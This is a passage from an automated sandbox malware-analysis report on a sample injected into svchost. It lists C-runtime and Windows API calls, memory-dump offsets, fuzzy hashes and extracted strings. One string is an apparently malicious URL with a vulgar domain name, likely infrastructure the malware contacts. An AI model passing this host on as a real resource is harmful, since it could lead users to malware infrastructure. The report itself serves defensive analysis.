            • Opcode Fuzzy Hash: 486543b36bc22eefedf567bf4d430d0573bcb597a3cf54fc02cedf25875093f5
            • Instruction Fuzzy Hash: 3301C432D01FD5ABCB10ABAB984A75DB760BF10B25F050109F43067691C7746E81CBD1
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • _malloc.LIBCMT ref: 001E735A
              • Part of subcall function 001E7287: __FF_MSGBANNER.LIBCMT ref: 001E72A0
              • Part of subcall function 001E7287: __NMSG_WRITE.LIBCMT ref: 001E72A7
              • Part of subcall function 001E7287: HeapAlloc.KERNEL32(00000000,00000001,00000001,00000000,00000000,?,001E4AD9,00000000,00000001,00000000,?,001E6706,00000018,001EB230,0000000C,001E6796), ref: 001E72CC
            • _free.LIBCMT ref: 001E736D
            Memory Dump Source
            • Source File: 00000009.00000002.381475492.00000000001E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 001E0000, based on PE: true
            • Associated: 00000009.00000002.381475492.00000000001F1000.00000040.00001000.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_9_2_1e0000_svchost.jbxd
            Similarity
            • API ID: AllocHeap_free_malloc
            • String ID:
            • API String ID: 2734353464-0
            • Opcode ID: e6de9716df1e0b37407583ae372057fb759d0f9f2c86f7cc6cad2e6402d979b8
            • Instruction ID: e3e9cbfc708d4195514446bea7eb58fddb85f831e16d843f23887d7560249a17
            • Opcode Fuzzy Hash: e6de9716df1e0b37407583ae372057fb759d0f9f2c86f7cc6cad2e6402d979b8
            • Instruction Fuzzy Hash: 6B11E732408DD5ABEF652BB7AC0565E3794BF643B0F210125FD598B2D1DF34C980A790
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • __getptd.LIBCMT ref: 001E4059
              • Part of subcall function 001E4276: __getptd_noexit.LIBCMT ref: 001E4279
              • Part of subcall function 001E4276: __amsg_exit.LIBCMT ref: 001E4286
            • __getptd.LIBCMT ref: 001E4070
            • __amsg_exit.LIBCMT ref: 001E407E
            • __lock.LIBCMT ref: 001E408E
            • __updatetlocinfoEx_nolock.LIBCMT ref: 001E40A2
            Memory Dump Source
            • Source File: 00000009.00000002.381475492.00000000001E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 001E0000, based on PE: true
            • Associated: 00000009.00000002.381475492.00000000001F1000.00000040.00001000.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_9_2_1e0000_svchost.jbxd
            Similarity
            • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
            • String ID:
            • API String ID: 938513278-0
            • Opcode ID: fde637bdd93494da09048d9a06ae38b967bd6016be1deaad6758eb8f1b0a905d
            • Instruction ID: b5ff607f47080a3e03797e4725816546e035de8dfef3f44677289c0f7367d5b6
            • Opcode Fuzzy Hash: fde637bdd93494da09048d9a06ae38b967bd6016be1deaad6758eb8f1b0a905d
            • Instruction Fuzzy Hash: 87F02432904FC0DBEB20FFEBA907B8D73A16F14B24F104118F200AB1D2CB6408408B56
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 001E7154
            • __isleadbyte_l.LIBCMT ref: 001E7187
            • MultiByteToWideChar.KERNEL32(00000080,00000009,?,?,?,00000000,?,?,?), ref: 001E71B8
            • MultiByteToWideChar.KERNEL32(00000080,00000009,?,00000001,?,00000000,?,?,?), ref: 001E7226
            Memory Dump Source
            • Source File: 00000009.00000002.381475492.00000000001E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 001E0000, based on PE: true
            • Associated: 00000009.00000002.381475492.00000000001F1000.00000040.00001000.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_9_2_1e0000_svchost.jbxd
            Similarity
            • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
            • String ID:
            • API String ID: 3058430110-0
            • Opcode ID: 81de882e6cf616d074a8c7332f2c520cb974c171469d8ec289cfeae5a39096df
            • Instruction ID: fbaaf592c968a9b0b15d766c9478079cc8ca361372cf837c4cf5e4f53b433339
            • Opcode Fuzzy Hash: 81de882e6cf616d074a8c7332f2c520cb974c171469d8ec289cfeae5a39096df
            • Instruction Fuzzy Hash: 8F319C31A087D6EFEB25DFA6CC80AAE7BA5AF01311B1585A9F4658B1D1E330DD80DB50
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            Strings
            • http://pe.suckmycocklameavindustry.in/, xrefs: 001E13C4
            • abcdefghijklmnopqrstuvxyz, xrefs: 001E13E2
            Memory Dump Source
            • Source File: 00000009.00000002.381475492.00000000001E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 001E0000, based on PE: true
            • Associated: 00000009.00000002.381475492.00000000001F1000.00000040.00001000.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_9_2_1e0000_svchost.jbxd
            Similarity
            • API ID: _calloc
            • String ID: abcdefghijklmnopqrstuvxyz$http://pe.suckmycocklameavindustry.in/
            • API String ID: 1679841372-1691302648
            • Opcode ID: 01c4f663d4c9ceca0071b1a52a98fbe1061ffbd34a98480adcae7b58f56183e8
            • Instruction ID: 8aa4299f828c6b89c4b0268dac7bc3bd29efec4d9c6176f27cd6deee8c6d571c
            • Opcode Fuzzy Hash: 01c4f663d4c9ceca0071b1a52a98fbe1061ffbd34a98480adcae7b58f56183e8
            • Instruction Fuzzy Hash: 32F0FC36700A55678720975EEC01ADF73DAEBC4371B044166ED49C7700F7719D1083D0
            Uniqueness

            Uniqueness Score: -1.00%